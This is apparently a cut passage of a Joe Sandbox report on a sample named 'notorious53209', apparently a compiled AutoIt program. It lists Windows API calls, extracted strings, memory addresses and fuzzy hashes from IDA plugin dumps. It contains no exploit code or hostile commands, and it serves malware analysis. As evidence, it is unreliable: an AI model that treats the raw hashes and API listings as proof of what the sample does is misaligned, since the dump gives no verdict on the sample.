                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                            • String ID:
                                            • API String ID: 2833360925-0
                                            • Opcode ID: 4ed7aabbbe1aba02ef6062ff22b579406365c0f84a95f574fc757efc2acb5136
                                            • Instruction ID: a0fb7735b1e19921d8efe8ee6dd521968d09610531eb2b5be5a83e2eddfd7c4b
                                            • Opcode Fuzzy Hash: 4ed7aabbbe1aba02ef6062ff22b579406365c0f84a95f574fc757efc2acb5136
                                            • Instruction Fuzzy Hash: 0B015B31E21A29DBCF01EFE8ED4C6EDBB78BB09701F410566E805B2141DB309960C7A1
                                            APIs
                                            • CLSIDFromProgID.OLE32 ref: 0028766F
                                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 0028768A
                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0028758C,80070057,?,?), ref: 00287698
                                            • CoTaskMemFree.OLE32(00000000), ref: 002876A8
                                            • CLSIDFromString.OLE32(?,?), ref: 002876B4
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                            • String ID:
                                            • API String ID: 3897988419-0
                                            • Opcode ID: 89f4da341a22f323dea06e7d845e1945c82e3a8bb15a5bf2cb4b8bad06c56924
                                            • Instruction ID: 1cf23372a3448d431c2526e303c0b5f1c991259bf2dc5cdb590f5bb5e1fe2632
                                            • Opcode Fuzzy Hash: 89f4da341a22f323dea06e7d845e1945c82e3a8bb15a5bf2cb4b8bad06c56924
                                            • Instruction Fuzzy Hash: 8A01D476616614BBDB10AF18ED08BAA7BADEB44751F204128FD04D2251F731DD5087A0
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00288608
                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00288612
                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00288621
                                            • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00288628
                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0028863E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocateErrorLastProcess
                                            • String ID:
                                            • API String ID: 47921759-0
                                            • Opcode ID: 95f7d70b88cb98db2c15b6ec7b6c01ac3a7b5fc7f04e2535ca7aac56a4bd137f
                                            • Instruction ID: 17a477a80fb0c972bf34862cbb839341071ee32e067f6266782a03c748a39ce2
                                            • Opcode Fuzzy Hash: 95f7d70b88cb98db2c15b6ec7b6c01ac3a7b5fc7f04e2535ca7aac56a4bd137f
                                            • Instruction Fuzzy Hash: 8DF0C274211215BFEB102FA8ED8DE6B3BACEF89754F444525F909C21A0DB709C51DB60
                                            APIs
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00288669
                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00288673
                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00288682
                                            • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00288689
                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0028869F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: HeapInformationToken$AllocateErrorLastProcess
                                            • String ID:
                                            • API String ID: 47921759-0
                                            • Opcode ID: 5db9682db306efbd9dc10e363cd3c024ff191408923608484da2567dc004d7b5
                                            • Instruction ID: 9ff3c100bd0f5a2d72d9af9604fab7340ebe6d137f438e6a9c140d62188de86a
                                            • Opcode Fuzzy Hash: 5db9682db306efbd9dc10e363cd3c024ff191408923608484da2567dc004d7b5
                                            • Instruction Fuzzy Hash: 29F0C274211315BFEB112FA8EC8CE673BACEF89754B500525F909C21A0DB70DC60DB60
                                            APIs
                                            • GetDlgItem.USER32(?,000003E9), ref: 0028C6BA
                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0028C6D1
                                            • MessageBeep.USER32(00000000), ref: 0028C6E9
                                            • KillTimer.USER32(?,0000040A), ref: 0028C705
                                            • EndDialog.USER32(?,00000001), ref: 0028C71F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                            • String ID:
                                            • API String ID: 3741023627-0
                                            • Opcode ID: c800b45cabe81a8a03a51c737b835e4977756407335002e943d87aefc8bf313c
                                            • Instruction ID: cd6a3999876aeedcd53e452a0306a5c1279054279442cb63c134c61e0be84c60
                                            • Opcode Fuzzy Hash: c800b45cabe81a8a03a51c737b835e4977756407335002e943d87aefc8bf313c
                                            • Instruction Fuzzy Hash: 69016274521704ABEB616F24ED8EF96B7BCFF00705F100669F552A14E1EBF0A9A48F90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                            • String ID:
                                            • API String ID: 2625713937-0
                                            • Opcode ID: e339cfc0ccd986873e92f8de81a9648b2e5b4354a263bfda8366bede876072cf
                                            • Instruction ID: 5cf4655203d7ef1051595bf64f8160c5bc2c58fd863e8aed4f726ef09f775320
                                            • Opcode Fuzzy Hash: e339cfc0ccd986873e92f8de81a9648b2e5b4354a263bfda8366bede876072cf
                                            • Instruction Fuzzy Hash: 02F0C971014209EBDB515F2AFD0C7683BA4EB013B6F048238E529550F1C73289A9DF60
                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00288E7F
                                            • CloseHandle.KERNEL32(?), ref: 00288E94
                                            • CloseHandle.KERNEL32(?), ref: 00288E9C
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00288EA5
                                            • HeapFree.KERNEL32(00000000), ref: 00288EAC
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                            • String ID:
                                            • API String ID: 3751786701-0
                                            • Opcode ID: d7742c56d71bac62a6dc5b8f4369688ce4e7428b28d63ea1c3b72134efa042c3
                                            • Instruction ID: 5777163c2a075cab07b40c7db55dcf851ef9979d731b9c538dc28ace346876c9
                                            • Opcode Fuzzy Hash: d7742c56d71bac62a6dc5b8f4369688ce4e7428b28d63ea1c3b72134efa042c3
                                            • Instruction Fuzzy Hash: 57E0C276004001FBDA411FE5FE0C90ABBA9FB89322B148730F21981070CB329420DB50
                                            APIs
                                              • Part of subcall function 00250FF6: std::exception::exception.LIBCMT ref: 0025102C
                                              • Part of subcall function 00250FF6: __CxxThrowException@8.LIBCMT ref: 00251041
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                              • Part of subcall function 00237BB1: _memmove.LIBCMT ref: 00237C0B
                                            • __swprintf.LIBCMT ref: 0024302D
                                            Strings
                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00242EC6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                            • API String ID: 1943609520-557222456
                                            • Opcode ID: 3157ee01b81fd894a84ca0541b1cf0f6f76dec6883fcf488df91e097595e969f
                                            • Instruction ID: 2be626fb524a5d51f1db2da5018245d5fd2ac13c41a02b25e39d688493543527
                                            • Opcode Fuzzy Hash: 3157ee01b81fd894a84ca0541b1cf0f6f76dec6883fcf488df91e097595e969f
                                            • Instruction Fuzzy Hash: 4E919FB11287029FCB28EF24D885D6EB7B4EF45710F00491DF886972A1DA70EE68CF52
                                            APIs
                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0028B981
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ContainedObject
                                            • String ID: AutoIt3GUI$Container$%,
                                            • API String ID: 3565006973-3233391797
                                            • Opcode ID: 65f6a736ad7ed8692bba538ae0232e6104985549d5a6e3ffa044ccb7aa9b4a5a
                                            • Instruction ID: 9c834e89f3163b8da08acceb3de16889c51d8a3e5d823cecf829181497b4b274
                                            • Opcode Fuzzy Hash: 65f6a736ad7ed8692bba538ae0232e6104985549d5a6e3ffa044ccb7aa9b4a5a
                                            • Instruction Fuzzy Hash: 8E916B746212029FDB25DF28C884B6AB7F8FF49710F24856EF94ACB691DB70E854CB50
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 002552DD
                                              • Part of subcall function 00260340: __87except.LIBCMT ref: 0026037B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__87except__start
                                            • String ID: pow
                                            • API String ID: 2905807303-2276729525
                                            • Opcode ID: ce31c5703fffbe1db780e85bbdbc4044dbb72202ef085f055a7073f5b6703431
                                            • Instruction ID: 2d52df8d017c38076665ba0591356ee0b8656fc13793d40c5382df728e98700a
                                            • Opcode Fuzzy Hash: ce31c5703fffbe1db780e85bbdbc4044dbb72202ef085f055a7073f5b6703431
                                            • Instruction Fuzzy Hash: B1517B21A3860397C7217F14D9A537F2B909B00352F204999EC99812E5EFB48CF8EF49
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #$+
                                            • API String ID: 0-2552117581
                                            • Opcode ID: ae3996132efe73792219b25303d31a10338d6bfeb9f104ae8debaa6b17bf93ac
                                            • Instruction ID: f6a77addb470c31c73024bc2d91f99069515875ca0997fca5b156960a2fe0499
                                            • Opcode Fuzzy Hash: ae3996132efe73792219b25303d31a10338d6bfeb9f104ae8debaa6b17bf93ac
                                            • Instruction Fuzzy Hash: 49514379526666DFCF25EF28C888AFA7BA4EF15310F144095EC919B2E0C7309C66CB60
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove$_free
                                            • String ID: Oa$
                                            • API String ID: 2620147621-3294801368
                                            • Opcode ID: 06319e984518f3072ae285ae97ab156dd5904a267d433193fee48863f90fcdb9
                                            • Instruction ID: 4243148f1e6124f58388cd136ea4d380e4936d5c5eba26a5ccf0bdeca05a1b4c
                                            • Opcode Fuzzy Hash: 06319e984518f3072ae285ae97ab156dd5904a267d433193fee48863f90fcdb9
                                            • Instruction Fuzzy Hash: 3F516D719283429FDB28CF28C44172BBBE5BF89314F54492DE89987351DB31D925CF82
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memset$_memmove
                                            • String ID: ERCP
                                            • API String ID: 2532777613-1384759551
                                            • Opcode ID: 7aede18cd8caa10cb6e06249a0550da1686fdd4ab0298b65745ced90f1a04e68
                                            • Instruction ID: 642f63dc23869e14205ff27376f000c66983d7325a492c48d74ea82717c7c4dc
                                            • Opcode Fuzzy Hash: 7aede18cd8caa10cb6e06249a0550da1686fdd4ab0298b65745ced90f1a04e68
                                            • Instruction Fuzzy Hash: 6251C77192070A9BDB28CF55C8897ABBBF4FF04714F10456EE94AC7281E77095A5CB41
                                            APIs
                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002B76D0
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002B76E4
                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002B7708
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window
                                            • String ID: SysMonthCal32
                                            • API String ID: 2326795674-1439706946
                                            • Opcode ID: 21b9d87f5912f39f9b5b84c71137ccc6cc163e70d8266fb325ca4953e6360ecd
                                            • Instruction ID: a4ce9ed2d39930076ed39072d4fb4b09918572bcbe84922b8c4da904ab6c21e6
                                            • Opcode Fuzzy Hash: 21b9d87f5912f39f9b5b84c71137ccc6cc163e70d8266fb325ca4953e6360ecd
                                            • Instruction Fuzzy Hash: F321A332524219BBDF12CF64DC46FEA3B79EF89754F110214FE156B1D0DAB1AC609BA0
                                            APIs
                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002B6FAA
                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002B6FBA
                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002B6FDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$MoveWindow
                                            • String ID: Listbox
                                            • API String ID: 3315199576-2633736733
                                            • Opcode ID: 4f59b6b103c4eaa017b64e6d5121eb0a73d2c9a4798ee6142b642f377144bc04
                                            • Instruction ID: 227e2bcb87ef030785b30c434c4d4e7ef5049308f753a3da465f8cafcf2acf7c
                                            • Opcode Fuzzy Hash: 4f59b6b103c4eaa017b64e6d5121eb0a73d2c9a4798ee6142b642f377144bc04
                                            • Instruction Fuzzy Hash: 9F21C9326201197FDF118F54EC89FFB376AEF89794F018124F91597590C675AC61CBA0
                                            APIs
                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002B79E1
                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002B79F6
                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002B7A03
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
